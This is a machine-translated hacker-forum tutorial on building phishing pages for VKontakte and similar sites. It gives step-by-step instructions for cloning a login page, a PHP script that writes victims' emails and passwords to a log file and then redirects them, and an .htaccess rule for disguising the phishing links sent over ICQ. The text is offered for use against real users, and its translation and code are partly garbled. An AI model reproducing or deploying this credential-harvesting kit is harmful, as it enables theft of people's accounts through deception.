This page has been robot translated, sorry for typos if any. Original content here.

Fake in haste

[iNtrO]

There was nothing to do, it was in the evening .... Actually, my first article (the first one on the anti-chat) pulled me through the fact that in the buy / sell / exchange / roll section for large, there is a topic in which one hecker sold fakes as much 10 vmz, and often asked to create one or another fake ...
I will tell you in one article how to get a universal fake almost under everything that ugone! I will show on the example of fake vkontakte.

[SeaRchINg]

And so, the first thing we need is to choose a victim resource and collect all the information we need, and we only need a copy of some pages. We are going to vkontakte.ru through Operu (!) . We press the input button, get on login.php, take it and take it as our fake index. We press in the opera: File -> Save As -> In the opened dialog under the name we select (by default, there is a Web Archive ....) " HTML File with Images ", and go to the File Name column and write index (or login.htm - depending on the page)


Next, enter there unrealistic data and get to the page on which it is written
This e-mail address is not registered or the password is incorrect.
We keep it the same way, so instead of index we write bad .
Next, we drive in the phrase Vkontakte.ru on Google.ru, click the Additional Results from vkontakte.ru ” and look for something related to the contact eror ... On the second page I found VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- remember, we need this link
Use, all we need for fake from the resource, we already have.

[CoDiNg]

Tax, now we investigate the login form. Open our index.html and look for the login form.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "gray"> Email: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "gray"> Password: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertical-align: middle;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Alien computer </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
From here we remember 3 things:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = " pass " value = "" id = "pass" size = "25" />
It is in these 3 things that the first part of the uniqueness is contained, on any social network or email or anywhere else, everywhere the entry form (fields) will be in this view (well, just the name of the fields wakes up), for example,
<input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = " st.password ">
Ie, the name of the fields is simply different, the elements of the design, but the function is the same for everyone.
Now we create a php file, and call it for example login.php , its contents:

PHP Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
flock ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri + )@ (( 0 0a-z- + + +.) ( [0-9a-z[2.4,4 [ / i]) i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'password' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'password' ]. "\ n" );
header ( "Location: http: //" );
} else {
header ( "Location: http: //" );
}
flock ( $ f , 3 );
fclose ( $ f );
?>
Actually we are looking at the script, a couple of scrolls, but this is quite a normal fake, its functionality:
Saving variables transmitted, their verification, redirect depending on the verification.

And so, now back to those 3 lines:
<form method = "post" name = "login" id = "login" action = " login.php ">
here we have everything in order, the name of our script coincides with the name of their script, but it doesn’t coincide, then we replace it or we rename it.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
From here we need name = " email " and name = " pass "
Paste them into our script in the right place.
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
flock ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri + )@ (( 0 0a-z- + + +.) ( [0-9a-z[2.4,4 [ / i]) i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
header ( "Location: http: //" );
} else {
header ( "Location: http: //" );
}
flock ( $ f , 3 );
fclose ( $ f );
?>
Whoever did not notice is $ _POST ['email'] and $ _POST ['pass']

Next, we look at the creak, here the IF ELSE function is set, and pregmatch, that is, if the e-mail field corresponds to the e-mail (nick@mylo.ru, and not as driven), and the password field is not empty, then the first redirect is executed, if the e-mail does not match or the pass field is empty, then the second redirect. From this it follows that if chel introduced soap and something similar to a pass, then we throw him on the page with eror http://vkontakte.ru/blank.php?code=10 , and if he entered garbage (here we needed copy of the page bad.html? when we entered incorrect data), then we throw it back, that is we enter bad.htm.

PHP Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
flock ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_- Fri + )@ (( 0 0a-z- + + +.) ( [0-9a-z[2.4,4 [ / i]) i " , $ _POST [ 'email' ]) &&! empty ( $ _POST [ 'pass' ])) {
fputs ( $ f , $ _POST [ 'email' ]. ";" . $ _POST [ 'pass' ]. "\ n" );
header ( "Location: http://vkontakte.ru/blank.php?code=10" );
} else {
header ( "Location: bad.htm" );
}
flock ( $ f , 3 );
fclose ( $ f );
?>
We save.We fill all the crap on the server (login.php, index.htm + folder with files, bad.htm + folder with files), create the file log.txt (I advise you to come up with your unique name. Do not forget to change the script), set it to him chmod777.

3) a small update ...

This update is very suitable for SI, at the root of the FTP we create a .htaccess file with the following content:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION!!!
! index \ .htm - refer to this file redirect, if you have a fake, let's say login.html. then accordingly you need to rename the index to the login.

Tax, this file gives us a link more qualitative gazliv, namely:
Your fak.ru / any text, tobish knowing the link structure of the sogda fake, for example a contact, we can do this:


your fiction.ru / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
and vparit it on ICQ))) agree. less noticeable now fake))

That's all

[THe eND] Actually, what is unique, and the fact that you can go to classmates, also save the page, enter variables, replace urls (I immediately give http://odnoklassniki.ru/dk?st.cmd=error) and that's it, absolutely go to Mayil.ru, save the variables and replace and everything))) The only thing you may need is creativity, we will save not the main page, but the login page. You can also make any forum if you want to get an account ( send to pm
<a href="feik"> link to a topic </a>
, and in fake indicate this topic for redirect.